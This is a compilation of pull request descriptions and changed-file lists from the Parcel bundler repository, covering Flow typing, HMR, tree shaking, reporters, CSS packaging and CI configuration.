[eslint is good enough to detect the valid use case of `return await` in a `try`/`catch`](https://eslint.org/docs/rules/no-return-await). We also get clever with a short circuiting `||` in `Resolver` so I disabled it there, but we should probably rewrite it to be clearer in the future.
Test Plan: `yarn && yarn lint && yarn test`
=> eslint: enable no-return-await

packages/core/integration-tests/test/hmr.js, packages/core/integration-tests/test/integration/hmr-circular/index.js, packages/core/integration-tests/test/integration/hmr-dynamic/index.js, packages/core/integration-tests/test/integration/hmr-reload/index.js, packages/core/integration-tests/test/integration/hmr-reload/local.js, packages/core/parcel-bundler/src/builtins/hmr-runtime.js, packages/core/test-utils/src/utils.js
As mentioned in https://github.com/parcel-bundler/parcel/issues/289#issuecomment-379529297
Closes #289, closes #2675, closes #2606, closes #2455, closes #2509
Would case a full reload:
```js
document.body.innerHTML += "Test21213asdadsd<br>";
```
Would not:
```js
document.body.innerHTML += "Test21213asdadsd<br>";
if(module.hot){
module.hot.accept(()=>{
console.log("Hello");
})
}
```
See example
=> Unhandled HMR updates should cause a page reload

packages/core/parcel-bundler/test/babel-register.js, packages/core/parcel-bundler/test/mocha.opts, packages/core/watcher/src/child.js, packages/core/watcher/test/changeEvent.js, packages/core/watcher/test/errorHandling.js, packages/core/watcher/test/fswatcher.js, packages/dev/babel-register/index.js
This addresses the remaining failing tests in v2.
* Moves `parcel-bundler` to use `@parcel/babel-register` in its mocha options as it relies on `fs`, which is now flowified
* Lessens reliance on async `sleep` in watcher tests by waiting for the watcher to be ready and specific events to be emitted. I assume these events are public API?
Test Plan: `yarn && yarn flow && yarn lint && yarn test`
=> Fix remaining v2 tests

packages/core/integration-tests/test/integration/scope-hoisting/es6/export-undefined/a.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/parcel-bundler/src/scope-hoisting/hoist.js, packages/core/parcel-bundler/src/scope-hoisting/renamer.js
Previously:
`lib2.js: Cannot read property 'constantViolations' of undefined`
Now:
`lib2.js: export 'Multiply' is not defined`
```js
export {Multiply};
```
=> Scope Hoisting: Throw meaningful error on undefined exports

.flowconfig, packages/core/cache/src/Cache.js, packages/core/core/src/Asset.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/Dependency.js, packages/core/core/src/TransformerRunner.js, packages/core/utils/src/config.js, packages/core/utils/src/md5.js
This:   
* sets the `untyped-type-import` lint to `error`, which will cause flow to error when untyped modules are referenced from a file in strict mode   
* Opts `Asset` and `BundlerRunner` into flow strict mode.
* Makes `md5` an es module, flowifies it, separates its exports, and adjusts its references
* Addresses a sketchy null check in `BundlerRunner` where a falsy empty string would not throw.
=> Flowify md5 and flow strictify Asset and BundlerRunner

packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-multiassignment/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-multiassignment/b.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/parcel-bundler/src/scope-hoisting/shake.js
The treeshake function tried to remove the right side of assignment if expression was of this form (when nested in a sequence expression):
```js
var $TJPF$export$default = ($TJPF$export$THING = ($TJPF$export$SOME = undefined, $TJPF$exports.SOME = $TJPF$export$SOME), $TJPF$exports.THING = $TJPF$export$THING);
```
(Don't think "multiassignments" are the official name)
Bug was introduced by myself in #2418 🙈 
Part of #1984
from `react-transition-group`:
```js
exports.default = exports.EXITING = exports.ENTERED = exports.ENTERING = exports.EXITED = exports.UNMOUNTED = void 0;
var UNMOUNTED = 'unmounted';
exports.UNMOUNTED = UNMOUNTED;
var EXITED = 'exited';
exports.EXITED = EXITED;
var ENTERING = 'entering';
exports.ENTERING = ENTERING;
var ENTERED = 'entered';
exports.ENTERED = ENTERED;
var …
```
=> Make treeshaking handle "multiassignments"

packages/bundlers/default/src/DefaultBundler.js, packages/core/cache/package.json, packages/core/core/package.json, packages/core/core/src/AssetGraph.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/Graph.js, packages/core/types/index.js, packages/core/types/unsafe.js, packages/resolvers/default/package.json
This updates the remaining non-transformer src references. In the process, I made `GraphTraversalCallback` more generic, parameterized on `TContext`, which was necessary to correctly type `DefaultBundler.js`.
Test Plan: `yarn && yarn flow && yarn lint && yarn test`
=> Update remaining non-transformer src references

packages/bundlers/default/src/DefaultBundler.js, packages/core/cache/package.json, packages/core/cache/src/Cache.js, packages/core/core/package.json, packages/core/core/src/Asset.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/Config.js, packages/core/core/src/Graph.js, packages/core/core/src/TargetResolver.js, packages/core/core/src/loadEnv.js, packages/core/register/src/hook.js, packages/core/types/index.js, packages/core/types/unsafe.js, packages/resolvers/default/package.json, packages/transformers/babel/src/babel6.js, packages/transformers/babel/src/babel7.js, packages/transformers/babel/src/babelrc.js, packages/transformers/js/src/visitors/dependencies.js
This updates references to `utils` to use their `src` versions. Since we're not yet building v2, we can leverage `@babel/register` to run from these locations while benefitting from flow checking. This will be changed to a parallel `lib` build when Parcel 2 is ready to ship.
Updates `Asset.js` to pass an exact object, not including `getConfig`'s other options. This satisfies flow and cleans up our use of our own api. In the case of `parse` being missing, `null` is passed.
Test Plan: `yarn && yarn flow && yarn lint && yarn test`
=> Use src references for utils

packages/core/core/src/Asset.js, packages/core/plugin/package.json, packages/core/register/package.json, packages/core/types/index.js, packages/transformers/babel/package.json, packages/transformers/js/package.json, packages/transformers/terser/package.json
Similar to #2728 and #2730, this updates the final references from `lib` to `src`. This allows us to leverage flow properly and run the app and tests through `@babel/register` before we prepare a build process.
This refines the `Meta` type to include a `globals` key which is used to map global names to Assets.
=> Update transformer entries to use `src`

packages/core/core/package.json, packages/core/core/src/Asset.js, packages/core/core/test/Asset.test.js, yarn.lock
This moves `Asset.js` to use `flow strict`. It addresses what Flow calls sketchy null checks -- cases where we're using boolean logic to test whether something is null where falsy values could go unnoticed.
This also adds some basic test coverage to constructing `Asset`s to provide some confidence.
Note that this **does** change the logic in these places, but I believe this better implements intended behavior. For example, previously empty strings of `code` would not be considered, and now they are, as are `outputSize`s of 0, which also would have been ignored.
=> Flow strictify `Asset.js`

packages/core/parcel-bundler/src/SourceMap.js
If an original mapping had null and that map needed to be extended (aka null mappings from node_modules & TS).
`originalPositionFor` tried to get the location of this mapping.
Fixes #2738 
https://github.com/ross-pfahler/parcel-sourcemap-bug (note: remove yarn.lock if using yarn as it uses the Adobe corp artifactory)
Run the Repo it should work. Probably gonna add a test for this though.
Tried to write a test for this but it seems hard to write a minimal repro testcase for this. This was probably also the reason I never added tests for sourcemaps in node_modules.
=> Fix bug with original null mappings

packages/core/parcel-bundler/src/assets/JSAsset.js
.js = ajs | 0js | sjs
was scrolling through the code trying to find Windows path issues and found this one
=> Unescaped "." in regex for JSAsset

packages/core/integration-tests/test/hmr.js, packages/core/integration-tests/test/integration/hmr-new-bundle/index.html, packages/core/parcel-bundler/src/Bundler.js, packages/core/parcel-bundler/src/HMRServer.js
Fixes #1224.
When a new bundle is created, perhaps due to a CSS file being imported from JS, the HTML needs to be regenerated to insert a <link> tag for that new bundle. Previously this was not happening because the hash of the HTML bundle did not change so parcel did not re-package it. Now we invalidate this whenever there is a new bundle created.
In addition, we need to reload the page with HMR since the HTML could be modified.
=> Regenerate all bundles and trigger an HMR page reload when a new bundle is created

packages/core/core/src/AssetGraph.js, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/Graph.js, packages/core/types/index.js, packages/core/utils/src/dumpGraphToGraphViz.js
All nodes must implement the `Node` interface. References to `Graph` have been updated to include the `Node` parameter, which is basically the behavior we have now. In a following pull request, each type of graph will have its Node type updated to the union of all the possible node types in the graph.
Also removes the `Node` export from Graph and updates importers to use the one from `@parcel/types`.
Also adds annotations for return values from the `Graph`'s (so far) public api.
=> Parameterize Graph on `TNode`, a type of its Nodes

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/Graph.js, packages/core/types/index.js, packages/core/types/unsafe.js, packages/core/utils/package.json, packages/core/utils/src/dumpGraphToGraphViz.js, packages/runtimes/js/src/JSRuntime.js
This adds typings for each of the individual types of Nodes that can be contained in the Asset Graph and the Bundle Graph, separately. Asset Graph typing and Bundle Graph typing are separated in two different commits: `AssetGraph` extends `Graph<AssetGraphNode>`, where `AssetGraphNode` is the union of all possible node types in the Asset Graph. Bundle Graph does the same.
Since we're moving from generic `Node`s we'll need to refine each use to a particular Node type (or union of Node types). This is done predominantly by refining with `invariant`, which has a hardcoded meaning in flow which allows it to refine based on unique properties in a union type.
This also expands the interfaces declared in `@parcel/types` and enforces that the concrete classes implement them with `implements`. …
=> Add typings for node and graph types

packages/core/integration-tests/test/css.js, packages/core/integration-tests/test/sass.js, packages/core/parcel-bundler/src/Asset.js, packages/core/parcel-bundler/src/assets/CSSAsset.js
Fixes #2736
Fix underlying issue and undo workaround of #2518
Dependency URLs for bundles generated in subfolders would contain something like this `<img src="/../logo_color.78fe8740.svg">` (not properly resolved).
=> Correctly build dependency URLs (for CSS)

packages/core/core/src/Config.js
Config is being serialized/deserialized during worker initialization and was losing config path with default serialization.
Running simple example no longer crashes with an error. It still silently exits early for some reason, but that is a separate issue.
=> Add deserializer function to Config

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/Graph.js, packages/core/core/src/Parcel.js, packages/core/types/index.js, packages/core/utils/src/dumpGraphToGraphViz.js, packages/runtimes/js/src/JSRuntime.js
Separate graphviz debugging and have BundleGraph subclass Graph directly
Since `BundleGraph` was subclassing `AssetGraph` only to share the graphviz debugging, extract that into a utility and rebase it directly on `Graph`.
This also moves this debugging to use an environment variable rather than toggling code comments. I'm open to switching this back but I think it's quite nice.
This also simplifies the `AssetGraph` constructor, removing its unused argument and moving property initialization to the near-standardized property initialization proposal. Open to revert this as well.
Test Plan: Run flow, lint, and test. Run `PARCEL_DUMP_GRAPH=1 yarn test` and verify graphviz images are dumped.
=> Separate graphviz debugging and have BundleGraph subclass Graph directly

packages/core/cache/src/Cache.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/Graph.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/utils/package.json
* Updates several uses of $FlowFixMe to use `nullthrows` to enforce the expectation that values aren't null
* Moves nullthrows from devDependency to dependency in utils
* Adds flow annotations to return values in `Cache`, `Parcel`, and `BundlerRunner`, making the latter `strict`.
Test Plan: lint, flow, test. Verify output of simple example.
=> Miscellaneous flow cleanup

packages/core/cache/src/Cache.js, packages/core/core/src/Asset.js, packages/core/core/src/Config.js, packages/core/core/src/ConfigResolver.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/TransformerRunner.js, packages/core/parcel-bundler/src/Resolver.js, packages/core/parcel-bundler/src/transforms/babel/babelrc.js, packages/core/parcel-bundler/src/utils/loadPlugins.js, packages/core/utils/src/loadPlugins.js, packages/core/utils/src/localRequire.js, packages/dev/eslint-config/index.js, packages/resolvers/default/src/DefaultResolver.js, packages/transformers/babel/src/BabelTransformer.js, packages/transformers/babel/src/babelrc.js
See #2705 and #2707 for rationale.
Test Plan: lint, flow, and test. Run the simple example and verify its output.
=> Remove unnecessary await in returns from async functions

packages/core/cache/src/Cache.js, packages/core/core/src/Asset.js, packages/core/core/src/Config.js, packages/core/core/src/ConfigResolver.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/TransformerRunner.js, packages/core/parcel-bundler/src/Asset.js, packages/core/parcel-bundler/src/Bundler.js, packages/core/parcel-bundler/src/Resolver.js, packages/core/parcel-bundler/src/SourceMap.js, packages/core/parcel-bundler/src/assets/GLSLAsset.js, packages/core/parcel-bundler/src/assets/LESSAsset.js, packages/core/parcel-bundler/src/assets/RawAsset.js, packages/core/parcel-bundler/src/assets/SASSAsset.js, packages/core/parcel-bundler/src/transforms/babel/babelrc.js, packages/core/parcel-bundler/src/utils/getModuleParts.js, packages/core/parcel-bundler/src/utils/loadPlugins.js, packages/core/parcel-bundler/src/utils/localRequire.js, packages/core/parcel-bundler/test/sourcemaps.js, packages/core/utils/src/loadPlugins.js, packages/core/utils/src/localRequire.js, packages/core/watcher/test/fswatcher.js, packages/dev/eslint-config/index.js, packages/resolvers/default/src/DefaultResolver.js, packages/transformers/babel/src/BabelTransformer.js, packages/transformers/babel/src/babelrc.js, yarn.lock
This cherry-picks the following commits from master:
```
commit ee6d19f329a924955f5ea95c773449d3ae759d35 (wbinnssmith/cherry-pick-master)
Author: tje3d <tje3d@yahoo.com>
Date:   Fri Mar 1 14:04:29 2019 +0330
Remove unnecessary return await
commit b5cad1375663ae30cdf6e6baf4d171f4722de4ed
Author: Niklas Mischkulnig <mischnic@users.noreply.github.com>
Date:   Wed Jan 16 22:35:00 2019 +0100
Fix localRequire with package/path requests (#2425)
commit f97eb4ae1d401e45b4cb0fa3600625bae2b33f1e
Author: Jasper De Moor <jasperdemoor@gmail.com>
Date:   Mon Jan 7 05:13:53 2019 +0100
fix(sourcemaps): Handle null mappings properly (#2149)
commit adf574248ae2087d9c304428a9b098dbeac25c93
Author: sainthkh <sainthkh@naver.com>
Date:   Sun Feb 3 08:28:05 2019 +0900
Use the test to assert this.child.killed …
```
=> Cherry-pick fixes from master for flaky tests and others

packages/core/fs/package.json
This removes a dependency on `@parcel/utils` from `@parcel/fs`. It was unused and caused cyclic dependencies amongst the packages.
Test Plan: run `yarn` before and after and verify the following cycles are gone:
```
lerna WARN ECYCLE @parcel/fs -> @parcel/utils -> @parcel/fs
lerna WARN ECYCLE @parcel/watcher -> @parcel/utils -> @parcel/fs -> @parcel/utils -> @parcel/utils@^1.10.3
lerna WARN ECYCLE @parcel/workers -> @parcel/utils -> @parcel/fs -> @parcel/utils -> @parcel/utils@^1.10.3
lerna WARN ECYCLE @parcel/resolver-default -> @parcel/utils -> @parcel/fs -> @parcel/utils -> @parcel/utils@^1.10.3
lerna WARN ECYCLE parcel-bundler -> @parcel/fs -> @parcel/utils -> @parcel/fs -> @parcel/fs@^1.10.3
lerna WARN ECYCLE @parcel/utils -> @parcel/fs -> @parcel/utils
lerna WARN ECYCLE …
```
=> Remove utils dependency from fs

packages/core/workers/src/child.js
This clearly could easily throw if the call's response isn't awaited.
Messages are also okay with `idx` being optional.
Test Plan: `yarn test` without unhandled rejection warnings.
=> Remove unnecessary assertion

packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/Parcel.js, packages/core/core/test/AssetGraphBuilder.test.js, packages/resolvers/default/src/DefaultResolver.js
This unifies the concept of a `BuildAbortError`, which is often thrown in response to a build's abort controller being aborted. It also tests that it is properly thrown in `AssetGraphBuilder`'s `resolve` method if the signal has been aborted.
Previously, `Parcel.js` checked identity against an error that was never thrown, which would never have logged anything.
=> Unify build abort errors

flow-libs/chokidar.js.flow, packages/core/watcher/.babelrc, packages/core/watcher/index.js, packages/core/watcher/package.json, packages/core/watcher/src/Watcher.js, packages/core/watcher/src/child.js, packages/core/watcher/src/options.js, packages/core/watcher/test/changeEvent.js, packages/core/watcher/test/errorHandling.js, packages/core/watcher/test/fswatcher.js, packages/core/watcher/test/options.js, packages/core/watcher/test/watched.js
This adds types for chokidar, the package the watcher uses under the hood, as well as for the watcher itself.
There are a few meaningful changes to the runtime code, and are noted inline.
Test Plan: lint, flow, and test. Run the simple example and verify its output.
=> Flowify Watcher

flow-libs/cli-spinners.js.flow, flow-libs/ink.js.flow, packages/core/types/index.js, packages/core/utils/src/prettifyTime.js, packages/reporters/cli/.babelrc, packages/reporters/cli/package.json, packages/reporters/cli/src/BundleReport.js, packages/reporters/cli/src/CLIReporter.js, packages/reporters/cli/src/Log.js, packages/reporters/cli/src/Spinner.js, packages/reporters/cli/src/Table.js, packages/reporters/cli/src/UI.js, packages/reporters/cli/src/emoji.js, packages/reporters/cli/test/mocha.opts
This:
* Adds minimal necessary typings for ink and cli-spinners
* Annotates function arguments in `BundleReport` and `CLIReporter` and makes these files flow strict
* Makes existing types, including props for React components exact object types.
* Adds test package.json scripts to actually test `prettyError.test.js`
Test Plan: flow, lint, and test. Manually test the cli reporter using the simple example.
=> Flowify cli reporter

PARCEL_2_RFC.md
This allows for things like `@babel/parcel-transform` or which is explicit enough about what it is
=> Allow @scope/parcel-<kind> as a valid plugin name

packages/core/parcel/package.json, packages/reporters/cli/package.json, packages/reporters/cli/src/BundleReport.js, packages/reporters/cli/src/CLIReporter.js, packages/reporters/cli/src/SimpleCLIReporter.js, packages/reporters/cli/src/UI.js, packages/reporters/cli/src/index.js, packages/reporters/cli/src/logLevels.js, packages/reporters/cli/src/utils.js, packages/reporters/cli/test/SimpleCLIReporter.test.js, yarn.lock
This implements `SimpleCLIReporter`, an alternate reporter to export in non-TTY environments. Instead of using ink, which freely rewrites the screen to make updates, simply log messages to stdout/stderr.
This does, however, use ink to write out the bundle report, in favor of reusing that component code. Since only write once and never update the `<BundleReport>`, the screen is never rewritten, so it outputs nicely. We should continue to do this selectively if the main CLI expands.
Test Plan: 
* Disable unrefing of worker processes. This causes the main process to exit too early. This is a bug outside the scope of this PR that needs to be fixed.
* Invoke the simple example and pipe its output to a file. 
Verify:
```
...
Packaging async.1760b8d1.js...
Packaging react.e190d87e.js... …
```
=> Implement a simple CLI reporter for non-TTYs

packages/core/logger/package.json, packages/core/parcel-bundler/package.json, packages/core/utils/package.json, packages/core/watcher/package.json, packages/reporters/cli/package.json
Prettier and eslint are called from the root, so there's no need to have those scripts defined by at the package level.
=> remove unnecessary package level lint and format scripts

packages/core/logger/src/Logger.js, packages/core/workers/src/Worker.js, packages/core/workers/src/WorkerFarm.js, packages/core/workers/src/child.js, packages/core/workers/test/integration/workerfarm/console.js, packages/core/workers/test/workerfarm.js, packages/reporters/cli/src/CLIReporter.js
This removes the Logger's ability to patch `console.log` and friends. This was used in reporters that have sensitive stdio (such as the ink and JSON reporters) to prevent things from disrupting terminal output. This happened when plugins wrote to their stdout/stderr, which we have no control over. This currently only happens when [Browserslist writes a warning to stderr when its database is out of date](https://github.com/browserslist/browserslist/issues/361).
Instead, don't inherit subprocess stdio from the main process -- create a local pipe that transforms the stdio from the subprocess into lines sent to the logger. This will allow us to tag these log messages in the future as originating from a particular worker.
Note: it's still possible that plugins which run in the main process …
=> Only patch `console` in workers. Ignore their stdout.

packages/core/core/src/Asset.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/Dependency.js, packages/core/core/src/TransformerRunner.js, packages/core/core/test/Asset.test.js, packages/core/core/test/AssetGraph.test.js, packages/core/types/index.js, packages/transformers/js/src/JSTransformer.js, packages/transformers/js/src/visitors/fs.js
This prevents them from containing multiple references to the same file/dependency. Currently in v2 assets contain many duplicate `connectedFiles`
This also exposes a public api for retrieving them as Arrays. I'm thinking this, along with `addConnectedFile`/`addDependency`, should be the only public api to these structures when we wrap `Asset`.
In each case, the stored value is overwritten in when the new value is added.
Test Plan: wrote unit tests for `Asset` (`yarn test`)
=> Make connectedFiles and dependencies Maps

packages/bundlers/default/package.json, packages/core/cache/package.json, packages/core/core/package.json, packages/core/logger/package.json, packages/core/plugin/package.json, packages/core/types/package.json, packages/core/workers/package.json, packages/namers/default/package.json, packages/packagers/js/package.json, packages/resolvers/default/package.json, packages/runtimes/js/package.json, packages/transformers/babel/package.json, packages/transformers/css/package.json, packages/transformers/js/package.json, packages/transformers/terser/package.json
Since we run linting from the root of the monorepo, this isn't needed. Even packages with their own configs which extend `@parcel/eslint-config` can find it through the root-level symlinks from yarn workspaces.
Test Plan: `yarn lint`
=> Remove parcel's eslint config as a devDependency

.flowconfig, package.json, yarn.lock
I'm a little concerned about facebook/flow#7545, so we'll keep an eye on things and revert if necessary, but so far based on the test plan things seem fine.
Test Plan: 
* `yarn flow`. 
* Change the `version` field in `.flowconfig` and verify `yarn flow` does not start without matching versions
* Exercise `flow-for-vscode`'s autocomplete, go-to-definition, diagnostics, etc.
=> Upgrade flow to 0.97

packages/core/integration-tests/test/json-reporter.js, packages/core/utils/src/generateBundleReport.js, packages/reporters/cli/src/BundleReport.js, packages/reporters/json/.babelrc, packages/reporters/json/package.json, packages/reporters/json/src/JSONReporter.js, packages/reporters/json/test/mocha.opts
This adds a JSON reporter to Parcel 2. While refactoring how we invoke yarn and log its output, I found its JSON reporter really useful in the absence of a programmatic api. Similarly,  outputting feedback in newline-delimited json allows Parcel to be used in novel ways outside of JavaScript programs that could otherwise use it as a library.
This:
* Removes the old cli interface that was replaced in #2362
* Removes the cli reporter from the base parcel config. This replaced with an option for "environmental reporters", reporters that are automatically added when specified as an option in `ParcelOptions`. 
* This is to avoid coupling reporters specific to how Parcel was invoked (via the cli with or without `--json`, as a programmatic api, etc.) to the core config object.
* Patches …
=> Add JSON Reporter

azure-pipelines-template.yml, yarn.lock
This adds `--frozen-lockfile` to the yarn install to make it fail if the yarn.lock committed differs from what would be written after invoking yarn. This should prevent issues like those in #2942 and the one currently present in the `v2` branch
Test Plan: Let CI run with the first commit and let it fail. Add a commit fixing `yarn.lock` and let it pass.
=> CI: Fail if yarn.lock needs updates

packages/core/core/src/PackagerRunner.js, packages/core/core/src/ReporterRunner.js
In packaging and optimizing, we must report public bundles from within the workers, but they are not serializable. Use the worker's local weakmap to internal bundles and send those across IPC. In the main process, map those back to public bundles before giving them to plugins.
Test Plan: `yarn demo` in the simple example. This was broken before this change.
=> Public API: Convert bundles to internal equivalents across workers

azure-pipelines-template.yml
This backports #2943 to the master branch.
This adds `--frozen-lockfile` to the yarn install to make it fail if the yarn.lock committed differs from what would be written after invoking yarn. This should prevent issues like those in #2942 and the one currently present in the `v2` branch
Test Plan: Let CI run with the first commit and let it fail. Add a commit fixing `yarn.lock` and let it pass.
=> v1: CI: Fail if yarn.lock needs updates

packages/core/core/src/BundlerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/public/BundleGraph.js, packages/core/types/index.js
This implements a read-only, public `BundleGraph`, which should be used in place of the mutable version in every case but the bundler.
Test Plan: `yarn demo` in the simple example
=> Public API: Split BundleGraph into mutable and immutable variants

packages/core/core/package.json, packages/core/core/src/Parcel.js, packages/core/core/src/dumpGraphToGraphViz.js, yarn.lock
~~This implements graphviz dumping as a reporter. Right now, it's included in the default config, which feels wrong. It only reports when the `PARCEL_DUMP_GRAPH` environment variable is present.~~
~~It also needs access to the internals of each graph to provide useful debugging information, so undocumented `_dumpToGraphViz` methods are exposed on each graph, and are invoked in the reporter. This does not leak any information or control to plugins as it only has a side effect of writing the image to disk and returning a path to it.~~
This is now a development-only option. `graphviz` is now a `devDependency`. We now also early return in a way that should be able to be optimized out in production builds of parcel.
=> Reintroduce graphviz dumping as a development-only option

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/public/Bundle.js, packages/core/core/src/public/BundleGraph.js, packages/core/core/src/types.js, packages/core/types/index.js, packages/runtimes/js/src/JSRuntime.js
When adding new bundles to the bundle graph, we merge in a subgraph of the bundle graph into the bundle's own asset graph. This allows it to trace dependencies to other bundles and bundle groups.
However, merging this subgraph has a recursive effect: ancestor bundles will actually contain all the bundles of their children and every node, which makes serialization and IPC expensive, and sometimes impossible in the case a child bundle refers to its parent (see the `html-root` integration test).
Instead, convert bundle nodes to bundle reference nodes, which point to objects that don't expose the inner assetgraphs of bundles. Since they don't expose assetgraphs, they can't be recursive.
Test Plan: Run with graphviz visualization and verify `bundle_reference` nodes in bundle assetgraphs.
=> Replace bundles with bundle references when merging bundle graph into bundles

packages/bundlers/default/src/DefaultBundler.js, packages/configs/default/index.json, packages/configs/default/package.json, packages/core/core/src/BundlerRunner.js, packages/core/core/src/TargetResolver.js, packages/core/core/src/public/Bundle.js, packages/core/core/src/public/BundleGraph.js, packages/core/integration-tests/test/css.js, packages/core/integration-tests/test/utils.js, packages/core/types/index.js, packages/examples/simple/legacy.html, packages/examples/simple/modern.html, packages/examples/simple/src/async.js, packages/examples/simple/src/paragraphs.css, packages/namers/default/src/DefaultNamer.js, packages/packagers/css/package.json, packages/packagers/css/src/CSSPackager.js, packages/packagers/js/src/JSPackager.js, packages/runtimes/js/src/JSRuntime.js
This implements a basic css packager for Parcel 2:
* The css packager currently just concatenates the bundle's css together . No support for source maps yet.
* The default bundler now removes non-matching assets when assembling bundles (e.g. it does not include css text in a js bundle). It leaves behind asset references in their place.
* `AssetGraph` now exposes `traverseAssetsWithReferences` which iterates both "real" assets as well as references.
* In the case of asset references, the JS Packager no longer includes content, and instead leaves behind an empty no-op function.
A no-op will not always be the desired behavior for importing non-matching assets: for example CSS Modules export a mapping, and raw assets export a path. @padmaia and I believe that it might be best in those cases …
=> Implement Basic CSS Packager

packages/core/parcel-bundler/src/transforms/postcss.js
=> BUG: postcss module generates wrong hashes

packages/core/integration-tests/test/integration/scope-hoisting/es6/pure-assignment/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/pure-assignment/b.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/parcel-bundler/src/scope-hoisting/shake.js
Fixes #2909.
For example, assigning a `displayName` to a function is pretty common in react code, and does not cause side effects.
=> Shake exports with pure property assignments

.flowconfig, package.json, packages/core/fs/src/index.js, yarn.lock
* Upgrades flow to version 0.98.1 in `flow-bin` and `.flowconfig`
* Normalizes return from promisified `realpath` to always return a promise
Test Plan: `yarn flow`
=> Update to flow 0.98.1

packages/core/core/src/TargetResolver.js, packages/core/core/src/TransformerRunner.js, packages/core/fs/src/index.js
Fixes a handful of issues:
* Asset size was not incremented past `BUFFER_LIMIT`
* Make promisified `realpath` an async function so errors are actually caught in the `try`/`catch`
* Revert making all development modes use a browser-only target. This should only be for the built-in server where we know we're targeting browsers only.
=> Assorted cleanup

packages/core/core/src/Asset.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/TransformerRunner.js, packages/core/core/src/public/Asset.js, packages/core/core/src/public/Bundle.js, packages/core/core/src/public/BundleGraph.js, packages/core/core/src/public/MainAssetGraph.js, packages/core/core/src/public/utils.js, packages/core/core/src/types.js, packages/core/types/index.js, packages/transformers/babel/src/babel6.js, packages/transformers/babel/src/babel7.js, packages/transformers/js/src/JSTransformer.js, packages/transformers/js/src/visitors/fs.js, packages/transformers/raw/src/RawTransformer.js
* Creates public `Asset` and `MutableAsset` interfaces and implementations, which prevent access to internal-only methods like `commit`, direct access to the `content` blob, the `Map`s used for dependency and connected files, etc.
* Currently `MutableAsset` is only needed in `Transformer#transform`!
* Makes `CacheEntry` an internal-only type
* Removes unused `TransformFinishedEvent` (cc @DeMoorJasper ?) which exposed a `CacheEntry`
* Fixes types in `TransformerRunner` and normalizes all returned types to `TransformerResults`
Test Plan: flow, lint, test. Manual test with the simple example.
=> Create public Asset and MutableAsset

packages/reporters/dev-server/src/Server.js, packages/reporters/dev-server/src/templates/500.html, packages/reporters/hmr-server/package.json, packages/reporters/hmr-server/src/HMRServer.js, packages/runtimes/hmr/src/loaders/hmr-runtime.js
This formats hmr stack traces and error messages from ansi to html.
See comments for detailed explanation to all changes
=> V2: Render errors on dev and hmr using HTML instead of ansi

packages/core/core/src/Parcel.js, packages/core/core/src/resolveOptions.js, packages/core/core/test/AssetGraphBuilder.test.js, packages/core/core/test/TransformerRunner.test.js, packages/core/parcel/src/cli.js, packages/core/test-utils/src/utils.js, packages/core/types/index.js, packages/reporters/cli/src/SimpleCLIReporter.js, packages/reporters/cli/test/SimpleCLIReporter.test.js
In the CLI, currently all exceptions are logged but are caught and allow the process to exit gracefully, even outside watch mode.
Instead:
* Catch all errors in watch mode **within Parcel**. With reporter infrastructure, it should be clear what caused an error, without disrupting 
* Should certain classes of error allow Parcel to be terminated in watch mode? We should let things like e.g. transformer parse errors to keep the watcher going, but should more critical errors take down the watcher?
* In non-watch modes (not watch or server -- basically just the `build` command right now), throw exceptions from within `Parcel#run` (reject the promise it returns) and expect callers to handle them. This will ultimately be tools wrapping Parcel, but right now amounts to just the CLI.
* If the CLI …
=> Exit with a code of 1 for failures outside watch

flow-libs/ncp.js.flow, packages/core/core/src/Parcel.js, packages/core/fs/package.json, packages/core/fs/src/index.js, packages/core/integration-tests/test/server.js
* Moves all the current properties on the core `Parcel` object to private properties. None are currently used externally, and most (if not all) look that they shouldn't be.
* Removes the `.bundle()` method, which wasn't used publicly, simply called the bundler runner, and returned an internal-only `BundleGraph`. We now call out to the bundler runner directly inside Parcel.
* Removes `.package()` method, instead using it as an unexposed  function.
Currently `@parcel/register` isn't tested or flow-typed, so the test plan passes. However, `@parcel/register` broke a while back, and we should expose more narrow APIs on `Parcel` or elsewhere to get it functioning again.
Test Plan: flow, lint, test
=> Make Some Core Parcel API Private

.flowconfig, package.json, packages/core/core/src/Asset.js, packages/core/core/src/TargetResolver.js, packages/dev/babel-preset/index.js, packages/dev/babel-preset/package.json, packages/dev/eslint-config/package.json, yarn.lock
**NOTE: This does not add support to what Parcel can *build*, only how Parcel itself is built**
This adds support for the nullish coalescing operator[0] and optional chaining[1] proposals to JavaScript. These proposals are currently at Stage 1, which is quite early. However, given pain points in the codebase, the simplicity of these proposals, and their support across Babel, Flow, and ESLint, we can adopt them.
Should either of these proposals change or be withdrawn, codemodding back is pretty straightforward given their simplicity.
This PR also moves `eslint-config-prettier` to the eslint config package.
Test Plan: Updated a few usages with both proposals. Verify flow, lint, and test.
[0] https://github.com/tc39/proposal-nullish-coalescing
[1] …
=> Allow nullish coalescing and optional chaining in Parcel 2 codebase

packages/core/is-v2-ready-yet/.eslintrc, packages/dev/eslint-config/index.js, packages/dev/eslint-config/package.json, yarn.lock
